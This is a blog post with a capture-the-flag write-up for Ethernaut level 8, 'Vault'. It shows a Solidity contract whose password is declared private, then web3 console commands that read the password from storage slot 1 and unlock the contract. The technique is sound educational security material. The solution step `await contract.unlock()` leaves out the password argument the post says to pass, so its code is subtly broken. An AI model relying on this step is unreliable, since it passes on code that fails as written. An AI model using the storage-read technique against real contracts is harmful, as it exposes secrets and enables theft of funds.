DEV Community

Cover image for Ethernaut Hacks Level 8: Vault
Naveen ⚡
Naveen ⚡

Posted on

Ethernaut Hacks Level 8: Vault

This is the level 8 of Ethernaut game.

Pre-requisites

Hack

Given contract:

// SPDX-License-Identifier: MIT
pragma solidity ^0.6.0;

contract Vault {
  bool public locked;
  bytes32 private password;

  constructor(bytes32 _password) public {
    locked = true;
    password = _password;
  }

  function unlock(bytes32 _password) public {
    if (password == _password) {
      locked = false;
    }
  }
}
Enter fullscreen mode Exit fullscreen mode

player has to set locked to false.

Only way is by calling unlock by correct password.

Although password state variable is private, one can still read a storage variable by determining it's storage slot. Therefore sensitive information should not be stored on-chain, even if it is specified private.

Above, the password is at a storage slot of 1 in Vault.

Let's read it:

password = await web3.eth.getStorageAt(contract.address, 1)
Enter fullscreen mode Exit fullscreen mode

Call unlock with password:

await contract.unlock()
Enter fullscreen mode Exit fullscreen mode

Unlocked. Verify by:

await contract.locked() === false
Enter fullscreen mode Exit fullscreen mode

And that's it.

Learned something awesome? Consider starring the github repo 😄

and following me on twitter here 🙏

Top comments (0)